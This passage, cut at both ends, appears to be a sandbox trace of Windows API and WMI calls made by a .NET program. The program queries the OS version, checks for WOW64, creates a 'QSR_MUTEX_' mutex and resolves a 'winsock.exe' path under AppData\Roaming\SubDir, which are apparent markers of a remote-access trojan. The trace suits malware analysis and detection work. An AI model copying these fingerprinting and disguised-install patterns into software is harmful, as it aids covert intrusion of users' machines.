ppvObject=0x19e400 | out: ppvObject=0x19e400*=0x5efc9c) returned 0x0 [0185.179] WbemLocator:IRpcOptions:Query (in: This=0x5efc9c, pPrx=0x5efcb8, dwProperty=2, pdwValue=0x19e428 | out: pdwValue=0x19e428) returned 0x80004002 [0185.179] WbemLocator:IUnknown:Release (This=0x5efc9c) returned 0x3 [0185.179] WbemLocator:IUnknown:Release (This=0x5efcb8) returned 0x2 [0185.179] CoGetContextToken (in: pToken=0x19e948 | out: pToken=0x19e948) returned 0x0 [0185.179] CoGetContextToken (in: pToken=0x19e8a8 | out: pToken=0x19e8a8) returned 0x0 [0185.179] WbemLocator:IUnknown:QueryInterface (in: This=0x5efcb8, riid=0x19e978*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19e974 | out: ppvObject=0x19e974*=0x5be1c0) returned 0x0 [0185.180] IUnknown:AddRef (This=0x5be1c0) returned 0x4 [0185.180] IUnknown:Release (This=0x5be1c0) returned 0x3 [0185.180] IUnknown:Release (This=0x5be1c0) returned 0x2 [0185.180] WbemLocator:IUnknown:Release (This=0x590540) returned 0x2 [0185.180] SysStringLen (param_1=0x0) returned 0x0 [0185.180] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x593398, puCount=0x19ec48 | out: puCount=0x19ec48*=0x2) returned 0x0 [0185.180] WbemDefPath:IWbemPath:GetText (in: This=0x593398, lFlags=4, puBuffLength=0x19ec44*=0x0, pszText=0x0 | out: puBuffLength=0x19ec44*=0xf, pszText=0x0) returned 0x0 [0185.180] WbemDefPath:IWbemPath:GetText (in: This=0x593398, lFlags=4, puBuffLength=0x19ec44*=0xf, pszText="00000000000000" | out: puBuffLength=0x19ec44*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.180] CoGetContextToken (in: pToken=0x19ea98 | out: pToken=0x19ea98) returned 0x0 [0185.181] IUnknown:AddRef (This=0x5be1c0) returned 0x3 [0185.181] IEnumWbemClassObject:Clone (in: This=0x5be1c0, ppEnum=0x19ec54 | out: ppEnum=0x19ec54*=0x5bdd10) returned 0x0 [0185.264] IUnknown:QueryInterface (in: This=0x5bdd10, riid=0x6c221104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb18 | out: ppvObject=0x19eb18*=0x5bdd14) returned 0x0 [0185.264] IClientSecurity:QueryBlanket (in: This=0x5bdd14, pProxy=0x5bdd10, pAuthnSvc=0x19eb68, pAuthzSvc=0x19eb64, pServerPrincName=0x19eb5c, pAuthnLevel=0x19eb60, pImpLevel=0x19eb50, pAuthInfo=0x19eb54, pCapabilites=0x19eb58 | out: pAuthnSvc=0x19eb68*=0xa, pAuthzSvc=0x19eb64*=0x0, pServerPrincName=0x19eb5c, pAuthnLevel=0x19eb60*=0x6, pImpLevel=0x19eb50*=0x2, pAuthInfo=0x19eb54, pCapabilites=0x19eb58*=0x1) returned 0x0 [0185.264] IUnknown:Release (This=0x5bdd14) returned 0x1 [0185.264] IUnknown:QueryInterface (in: This=0x5bdd10, riid=0x6c2210f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb0c | out: ppvObject=0x19eb0c*=0x5f02b8) returned 0x0 [0185.264] IUnknown:QueryInterface (in: This=0x5bdd10, riid=0x6c221104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb08 | out: ppvObject=0x19eb08*=0x5bdd14) returned 0x0 [0185.265] IClientSecurity:SetBlanket (This=0x5bdd14, pProxy=0x5bdd10, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0185.276] IUnknown:Release (This=0x5bdd14) returned 0x2 [0185.276] WbemLocator:IUnknown:Release (This=0x5f02b8) returned 0x1 [0185.276] CoTaskMemFree (pv=0x5c0518) [0185.276] IUnknown:QueryInterface (in: This=0x5bdd10, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6f4 | out: ppvObject=0x19e6f4*=0x5f02b8) returned 0x0 [0185.276] WbemLocator:IUnknown:QueryInterface (in: This=0x5f02b8, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e6b0 | out: ppvObject=0x19e6b0*=0x0) returned 0x80004002 [0185.280] WbemLocator:IUnknown:QueryInterface (in: This=0x5f02b8, riid=0x6ccbfb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e4cc | out: ppvObject=0x19e4cc*=0x0) returned 0x80004002 [0185.283] IUnknown:QueryInterface (in: This=0x5bdd10, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e2a4 | out: ppvObject=0x19e2a4*=0x0) returned 0x80004002 [0185.292] WbemLocator:IUnknown:AddRef (This=0x5f02b8) returned 0x3 [0185.292] WbemLocator:IUnknown:QueryInterface (in: This=0x5f02b8, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e00c | out: ppvObject=0x19e00c*=0x0) returned 0x80004002 [0185.292] WbemLocator:IUnknown:QueryInterface (in: This=0x5f02b8, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19dfbc | out: ppvObject=0x19dfbc*=0x0) returned 0x80004002 [0185.292] WbemLocator:IUnknown:QueryInterface (in: This=0x5f02b8, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19dfc8 | out: ppvObject=0x19dfc8*=0x5f0214) returned 0x0 [0185.292] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5f0214, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19dfd0 | out: pCid=0x19dfd0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0185.292] WbemLocator:IUnknown:Release (This=0x5f0214) returned 0x3 [0185.292] CoGetContextToken (in: pToken=0x19e028 | out: pToken=0x19e028) returned 0x0 [0185.292] CoGetContextToken (in: pToken=0x19e430 | out: pToken=0x19e430) returned 0x0 [0185.293] WbemLocator:IUnknown:QueryInterface (in: This=0x5f02b8, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4c0 | out: ppvObject=0x19e4c0*=0x5f029c) returned 0x0 [0185.293] WbemLocator:IRpcOptions:Query (in: This=0x5f029c, pPrx=0x5f02b8, dwProperty=2, pdwValue=0x19e4e8 | out: pdwValue=0x19e4e8) returned 0x80004002 [0185.293] WbemLocator:IUnknown:Release (This=0x5f029c) returned 0x3 [0185.293] WbemLocator:IUnknown:Release (This=0x5f02b8) returned 0x2 [0185.293] CoGetContextToken (in: pToken=0x19ea08 | out: pToken=0x19ea08) returned 0x0 [0185.293] CoGetContextToken (in: pToken=0x19e968 | out: pToken=0x19e968) returned 0x0 [0185.293] WbemLocator:IUnknown:QueryInterface (in: This=0x5f02b8, riid=0x19ea38*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19ea34 | out: ppvObject=0x19ea34*=0x5bdd10) returned 0x0 [0185.293] IUnknown:AddRef (This=0x5bdd10) returned 0x4 [0185.293] IUnknown:Release (This=0x5bdd10) returned 0x3 [0185.293] IUnknown:Release (This=0x5bdd10) returned 0x2 [0185.293] IUnknown:Release (This=0x5be1c0) returned 0x2 [0185.294] SysStringLen (param_1=0x0) returned 0x0 [0185.295] IEnumWbemClassObject:Reset (This=0x5bdd10) returned 0x0 [0185.303] CoTaskMemAlloc (cb=0x4) returned 0x5a7f48 [0185.304] IEnumWbemClassObject:Next (in: This=0x5bdd10, lTimeout=-1, uCount=0x1, apObjects=0x5a7f48, puReturned=0x23dadfc | out: apObjects=0x5a7f48*=0x5f3090, puReturned=0x23dadfc*=0x1) returned 0x0 [0185.311] IUnknown:QueryInterface (in: This=0x5f3090, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e2b8 | out: ppvObject=0x19e2b8*=0x5f3090) returned 0x0 [0185.311] IUnknown:QueryInterface (in: This=0x5f3090, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e274 | out: ppvObject=0x19e274*=0x0) returned 0x80004002 [0185.312] IUnknown:QueryInterface (in: This=0x5f3090, riid=0x6ccbfb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e094 | out: ppvObject=0x19e094*=0x0) returned 0x80004002 [0185.312] IUnknown:QueryInterface (in: This=0x5f3090, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19de6c | out: ppvObject=0x19de6c*=0x0) returned 0x80004002 [0185.312] IUnknown:AddRef (This=0x5f3090) returned 0x3 [0185.312] IUnknown:QueryInterface (in: This=0x5f3090, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19dbd4 | out: ppvObject=0x19dbd4*=0x0) returned 0x80004002 [0185.312] IUnknown:QueryInterface (in: This=0x5f3090, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19db84 | out: ppvObject=0x19db84*=0x0) returned 0x80004002 [0185.312] IUnknown:QueryInterface (in: This=0x5f3090, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19db90 | out: ppvObject=0x19db90*=0x5f3094) returned 0x0 [0185.312] IMarshal:GetUnmarshalClass (in: This=0x5f3094, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19db98 | out: pCid=0x19db98*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0185.312] IUnknown:Release (This=0x5f3094) returned 0x3 [0185.312] CoGetContextToken (in: pToken=0x19dbf0 | out: pToken=0x19dbf0) returned 0x0 [0185.313] CoGetContextToken (in: pToken=0x19dff8 | out: pToken=0x19dff8) returned 0x0 [0185.313] IUnknown:QueryInterface (in: This=0x5f3090, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e088 | out: ppvObject=0x19e088*=0x0) returned 0x80004002 [0185.313] IUnknown:Release (This=0x5f3090) returned 0x2 [0185.313] CoGetContextToken (in: pToken=0x19e5c8 | out: pToken=0x19e5c8) returned 0x0 [0185.313] CoGetContextToken (in: pToken=0x19e528 | out: pToken=0x19e528) returned 0x0 [0185.313] IUnknown:QueryInterface (in: This=0x5f3090, riid=0x19e5f8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19e5f4 | out: ppvObject=0x19e5f4*=0x5f3090) returned 0x0 [0185.313] IUnknown:AddRef (This=0x5f3090) returned 0x4 [0185.313] IUnknown:Release (This=0x5f3090) returned 0x3 [0185.314] IUnknown:Release (This=0x5f3090) returned 0x2 [0185.314] CoTaskMemFree (pv=0x5a7f48) [0185.314] CoGetContextToken (in: pToken=0x19e930 | out: pToken=0x19e930) returned 0x0 [0185.314] IUnknown:AddRef (This=0x5f3090) returned 0x3 [0185.383] IWbemClassObject:Get (in: This=0x5f3090, wszName="__GENUS", lFlags=0, pVal=0x19ec44*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ecc4*=0, plFlavor=0x19ecc0*=0 | out: pVal=0x19ec44*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19ecc4*=3, plFlavor=0x19ecc0*=64) returned 0x0 [0185.384] IWbemClassObject:Get (in: This=0x5f3090, wszName="__PATH", lFlags=0, pVal=0x19ec28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ecac*=0, plFlavor=0x19eca8*=0 | out: pVal=0x19ec28*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ecac*=8, plFlavor=0x19eca8*=64) returned 0x0 [0185.391] IWbemClassObject:Get (in: This=0x5f3090, wszName="__RELPATH", lFlags=0, pVal=0x19ec28*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ecac*=8, plFlavor=0x19eca8*=64 | out: pVal=0x19ec28*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ecac*=8, plFlavor=0x19eca8*=64) returned 0x0 [0185.391] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x593398, puCount=0x19ec80 | out: puCount=0x19ec80*=0x2) returned 0x0 [0185.391] WbemDefPath:IWbemPath:GetText (in: This=0x593398, lFlags=4, puBuffLength=0x19ec7c*=0x0, pszText=0x0 | out: puBuffLength=0x19ec7c*=0xf, pszText=0x0) returned 0x0 [0185.391] WbemDefPath:IWbemPath:GetText (in: This=0x593398, lFlags=4, puBuffLength=0x19ec7c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19ec7c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.392] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x593398, puCount=0x19ec4c | out: puCount=0x19ec4c*=0x2) returned 0x0 [0185.393] WbemDefPath:IWbemPath:GetText (in: This=0x593398, lFlags=4, puBuffLength=0x19ec48*=0x0, pszText=0x0 | out: puBuffLength=0x19ec48*=0xf, pszText=0x0) returned 0x0 [0185.393] WbemDefPath:IWbemPath:GetText (in: This=0x593398, lFlags=4, puBuffLength=0x19ec48*=0xf, pszText="00000000000000" | out: puBuffLength=0x19ec48*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.393] IWbemClassObject:Get (in: This=0x5f3090, wszName="Caption", lFlags=0, pVal=0x19ec48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23db410*=0, plFlavor=0x23db414*=0 | out: pVal=0x19ec48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro", varVal2=0x0), pType=0x23db410*=8, plFlavor=0x23db414*=0) returned 0x0 [0185.394] SysStringByteLen (bstr="Microsoft Windows 10 Pro") returned 0x30 [0185.394] SysStringByteLen (bstr="Microsoft Windows 10 Pro") returned 0x30 [0185.394] IWbemClassObject:Get (in: This=0x5f3090, wszName="Caption", lFlags=0, pVal=0x19ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23db410*=8, plFlavor=0x23db414*=0 | out: pVal=0x19ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro", varVal2=0x0), pType=0x23db410*=8, plFlavor=0x23db414*=0) returned 0x0 [0185.394] SysStringByteLen (bstr="Microsoft Windows 10 Pro") returned 0x30 [0185.394] SysStringByteLen (bstr="Microsoft Windows 10 Pro") returned 0x30 [0185.397] CoGetContextToken (in: pToken=0x19eb80 | out: pToken=0x19eb80) returned 0x0 [0185.398] WbemLocator:IUnknown:Release (This=0x5f02b8) returned 0x1 [0185.398] IUnknown:Release (This=0x5bdd10) returned 0x0 [0185.444] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74650000 [0185.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x19ec74, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64ProcessÈj\r_+_ «·l\x08ï\x19", lpUsedDefaultChar=0x0) returned 14 [0185.445] GetProcAddress (hModule=0x74650000, lpProcName="IsWow64Process") returned 0x74669f10 [0185.445] GetCurrentProcess () returned 0xffffffff [0185.445] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ecd4 | out: Wow64Process=0x19ecd4*=1) returned 1 [0185.648] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="QSR_MUTEX_0kBRNrRz5TDLEQouI0") returned 0x3c8 [0185.671] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", nBufferLength=0x105, lpBuffer=0x19e7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", lpFilePart=0x0) returned 0x38 [0186.096] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe.config", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe.config", lpFilePart=0x0) returned 0x3f [0186.096] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe.config", nBufferLength=0x105, lpBuffer=0x19ecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe.config", lpFilePart=0x0) returned 0x3f [0186.329] GetCurrentProcess () returned 0xffffffff [0186.330] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f08c | out: TokenHandle=0x19f08c*=0x3cc) returned 1 [0186.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x19eb68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0186.336] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19f08c | out: lpFileInformation=0x19f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0186.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0186.338] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19f08c | out: lpFileInformation=0x19f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0186.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0186.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efb8) returned 1 [0186.340] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d0 [0186.341] GetFileType (hFile=0x3d0) returned 0x1 [0186.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efb4) returned 1 [0186.341] GetFileType (hFile=0x3d0) returned 0x1 [0186.359] GetFileSize (in: hFile=0x3d0, lpFileSizeHigh=0x19f080 | out: lpFileSizeHigh=0x19f080*=0x0) returned 0x8c8f [0186.359] ReadFile (in: hFile=0x3d0, lpBuffer=0x23e714c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f03c, lpOverlapped=0x0 | out: lpBuffer=0x23e714c*, lpNumberOfBytesRead=0x19f03c*=0x1000, lpOverlapped=0x0) returned 1 [0186.381] ReadFile (in: hFile=0x3d0, lpBuffer=0x23e714c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19eed8, lpOverlapped=0x0 | out: lpBuffer=0x23e714c*, lpNumberOfBytesRead=0x19eed8*=0x1000, lpOverlapped=0x0) returned 1 [0186.384] ReadFile (in: hFile=0x3d0, lpBuffer=0x23e714c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ed8c, lpOverlapped=0x0 | out: lpBuffer=0x23e714c*, lpNumberOfBytesRead=0x19ed8c*=0x1000, lpOverlapped=0x0) returned 1 [0186.385] ReadFile (in: hFile=0x3d0, lpBuffer=0x23e714c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ed8c, lpOverlapped=0x0 | out: lpBuffer=0x23e714c*, lpNumberOfBytesRead=0x19ed8c*=0x1000, lpOverlapped=0x0) returned 1 [0186.385] ReadFile (in: hFile=0x3d0, lpBuffer=0x23e714c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ed8c, lpOverlapped=0x0 | out: lpBuffer=0x23e714c*, lpNumberOfBytesRead=0x19ed8c*=0x1000, lpOverlapped=0x0) returned 1 [0186.395] ReadFile (in: hFile=0x3d0, lpBuffer=0x2202c1c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ecc4, lpOverlapped=0x0 | out: lpBuffer=0x2202c1c*, lpNumberOfBytesRead=0x19ecc4*=0x1000, lpOverlapped=0x0) returned 1 [0186.402] ReadFile (in: hFile=0x3d0, lpBuffer=0x2202c1c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ee40, lpOverlapped=0x0 | out: lpBuffer=0x2202c1c*, lpNumberOfBytesRead=0x19ee40*=0x1000, lpOverlapped=0x0) returned 1 [0186.403] ReadFile (in: hFile=0x3d0, lpBuffer=0x2202c1c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ed54, lpOverlapped=0x0 | out: lpBuffer=0x2202c1c*, lpNumberOfBytesRead=0x19ed54*=0x1000, lpOverlapped=0x0) returned 1 [0186.404] ReadFile (in: hFile=0x3d0, lpBuffer=0x2202c1c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ed54, lpOverlapped=0x0 | out: lpBuffer=0x2202c1c*, lpNumberOfBytesRead=0x19ed54*=0xc8f, lpOverlapped=0x0) returned 1 [0186.404] ReadFile (in: hFile=0x3d0, lpBuffer=0x2202c1c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ee14, lpOverlapped=0x0 | out: lpBuffer=0x2202c1c*, lpNumberOfBytesRead=0x19ee14*=0x0, lpOverlapped=0x0) returned 1 [0186.404] CloseHandle (hObject=0x3d0) returned 1 [0186.406] GetCurrentProcess () returned 0xffffffff [0186.406] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f1b4 | out: TokenHandle=0x19f1b4*=0x3d0) returned 1 [0186.407] GetCurrentProcess () returned 0xffffffff [0186.407] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f1b4 | out: TokenHandle=0x19f1b4*=0x3dc) returned 1 [0186.407] GetCurrentProcess () returned 0xffffffff [0186.408] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f08c | out: TokenHandle=0x19f08c*=0x3e0) returned 1 [0186.408] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir\\winsock.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19f08c | out: lpFileInformation=0x19f08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.408] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe.config", nBufferLength=0x105, lpBuffer=0x19eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe.config", lpFilePart=0x0) returned 0x3f [0186.408] GetFileAttributesExW (in: 